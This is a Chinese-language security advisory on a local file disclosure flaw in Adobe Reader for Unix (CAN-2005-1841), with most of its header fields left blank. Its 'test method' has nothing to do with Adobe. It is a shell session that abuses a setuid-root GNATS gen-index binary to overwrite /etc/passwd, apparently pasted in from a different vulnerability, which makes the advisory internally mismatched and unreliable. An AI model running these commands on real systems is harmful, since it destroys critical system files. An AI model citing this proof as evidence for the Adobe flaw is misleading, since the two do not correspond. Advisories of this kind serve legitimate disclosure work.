Adobe Reader For Unix本地文件泄露漏洞

信息提供：

漏洞类别：

攻击类型：

发布日期：

更新日期：

受影响系统：

安全系统：

Adobe Adobe Reader (Linux/Solaris) 7.0

Adobe Adobe Reader (IBM-AIX/HP-UX) 5.0.11

漏洞报告人：

漏洞描述：

BUGTRAQ  ID: 14165

CVE(CAN) ID: CAN-2005-1841

Adobe Reader是非常流行的PDF文件阅读器。

Adobe Reader for Unix中存在本地文件泄漏漏洞，本地攻击者可以利用这个漏洞浏览其他用户的PDF文件。。

在使用Adobe Reader打开PDF文件时，会在临时文件夹中随即生成临时文件。根据用户的umask（权限），这些临时文件可能拥有提升的权限。但是，在关闭PDF文档时会删除这些临时文件。

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

pi3@darkstar:~$ pwd

/home/pi3

pi3@darkstar:~$ ls -alh /etc/passwd

-rw-r--r--    1 root     root          795 May 19 18:49 /etc/passwd

pi3@darkstar:~$ ls -alh /usr/local/libexec/gnats/gen-index

-r-sr-xr-x    1 root     root         465k Nov 21  2004 /usr/local/libexec/gnats/gen-index*

pi3@darkstar:~$ /usr/local/libexec/gnats/gen-index -n -o /etc/passwd

pi3@darkstar:~$ ls -alh /etc/passwd

-rw-r--r--    1 root     root            1 Jun 16 17:34 /etc/passwd

pi3@darkstar:~$ cat /etc/passwd

pi3@darkstar:~$

解决方法：

厂商补丁：

Adobe

-----

目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

www.adobe.com/products/acrobat/readstep2.html